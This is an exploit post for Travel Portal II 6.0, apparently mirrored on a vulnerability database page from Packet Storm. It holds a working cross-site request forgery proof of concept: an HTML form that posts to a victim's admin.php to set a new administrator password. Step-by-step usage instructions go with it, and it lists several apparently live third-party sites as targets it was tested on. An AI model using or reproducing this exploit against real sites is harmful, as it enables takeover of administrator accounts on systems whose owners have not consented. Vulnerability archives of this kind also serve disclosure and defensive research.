Lucene search
K

Travel Portal II 6.0 Cross Site Request Forgery

🗓️ 12 Sep 2014 00:00:00Reported by KnocKoutType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 24 Views

Travel Portal II 6.0 CSRF Admin Password Change PoC Exploit by KnocKou

Code
`Travel Portal II (6.0) - CSRF Admin Password Change PoC Exploit  
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
[+] Author : KnocKout  
[~] Contact(onlymail) : [email protected]  
[~] HomePage : http://Cyber-Warrior.Org - http://h4x0resec.blogspot.com - http://www.cyber-warrior.org/100379  
[~] Greetz: DaiMon,furty,BackDoor,EthicalHacker,BARCOD3,SZE©,VolqaN,Septemb0x.. Unuttuklarýmýz affola..  
############################################################  
Turkey Security Group  
'h4x0re SECURITY'   
###########################################################  
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
|~Web App. : Travel Portal II (6.0)  
|~Affected Version : II 6.0 and predecessors.. / all version  
|~Official Software Web: http://www.tourismscripts.com/scripts/scripts/hotel-cars-flights-villas-flats-custom-potal-script.html  
|~PRICE : 349 Euro  
|~RISK : High  
|~Google Keyword/Dorks : N/A  
|~Tested On : Kali Linux \ Mozilla Firefox   
####################INFO################################  
  
admin password can be changed easily..  
  
####################Usage Exploit########################  
Exploitation  
Edit to exploit.html target website..  
Open exploit.html your browser..  
Determine your new password.  
GO TO ADMIN PANEL..  
####################Example affected sites & Tested on#####  
  
http://travelportal.tourismscripts.com/ ( Official Demo )  
http://almarjanmakkah.com  
http://www.istanbulairportal.com  
  
==============================================================================00  
Travel Portal II (6.0) - CSRF Admin Password Change PoC Exploit ; exploit.html  
==============================================================================0  
  
<h3>Travel Portal II (6.0) - CSRF Admin Password Change PoC Exploited by KnocKout</h3>  
<table>  
<tr>  
<form method="post" action="http://[VICTIM]/admin/admin.php">  
<input type="hidden" name="admin_id" value="1">  
<td align=right>Username:</td><td align=left><input name="admin_name" size="40" maxlength="40" value="admin"><td>  
</tr>  
<tr>  
<td align=right>New Password:</td><td align=left><input name="password" size="40" maxlength="40" ><td>  
</tr>  
<tr>  
<td></td><td><input type="submit" name="submit" value="Update Password"></td>  
</form>  
</tr>  
  
</table>  
  
=================================================================================  
  
.__ _____ _______   
| |__ / | |___ __\ _ \_______ ____   
| | \ / | |\ \/ / /_\ \_ __ \_/ __ \   
| Y \/ ^ /> <\ \_/ \ | \/\ ___/   
|___| /\____ |/__/\_ \\_____ /__| \___ >  
\/ |__| \/ \/ \/   
_____________________________   
/ _____/\_ _____/\_ ___ \   
\_____ \ | __)_ / \ \/   
/ \ | \\ \____  
/_______ //_______ / \______ /  
\/ \/ \/   
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation